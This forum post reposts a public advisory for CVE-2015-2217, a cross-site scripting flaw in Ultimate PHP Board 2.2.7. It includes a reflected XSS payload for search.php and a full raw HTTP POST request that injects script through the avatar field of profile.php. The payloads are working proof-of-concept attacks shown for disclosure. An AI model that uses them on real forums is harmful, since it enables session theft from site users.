kp112 Posted March 6, 2015 Report Posted March 6, 2015 Ultimate PHP Board (UPB) 2.2.7 Cross Site ScriptingUltimate PHP Board (UPB) version 2.2.7 suffers from a cross site scripting vulnerability.# Exploit Title : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability# CVE : CVE-2015-2217# Date : 4 March 2015# Exploit Author : CWH Underground# Discovered By : ZeQ3uL# Site : www.2600.in.th# Vendor Homepage : http://www.myupb.com# Software Link : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip# Version : 2.2.7 ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------'####################SOFTWARE DESCRIPTION####################Ultimate PHP Board is completely text based making it easy for anybody who has access to PHP can run a message board of their own without the need for MySQL.####################################DESCRIPTION FOR CROSS SITE SCRIPTING####################################myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.myUPB 2.2.7 is vulnerable; other versions may also be affected.####################VULNERABILITY DETAIL####################1. Reflect Cross Site Scripting (search.php)POC: /search.php?q='><script>alert(1)</script>2. Stored Cross Site Scripting (profile.php) POC:POST /upb/profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://localhost/upb/profile.phpCookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------287611866431947Content-Length: 716-----------------------------287611866431947Content-Disposition: form-data; name="u_email"t@t.com-----------------------------287611866431947Content-Disposition: form-data; name="u_loca"th-----------------------------287611866431947Content-Disposition: form-data; name="avatar"images/avatars/chic.jpg'><script>alert("hacked");</script>-----------------------------287611866431947Content-Disposition: form-data; name="u_site"http://-----------------------------287611866431947Content-Disposition: form-data; name="u_timezone"0-----------------------------287611866431947Content-Disposition: form-data; name="u_edit"Submit-----------------------------287611866431947--################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2################################################################################################################Source Quote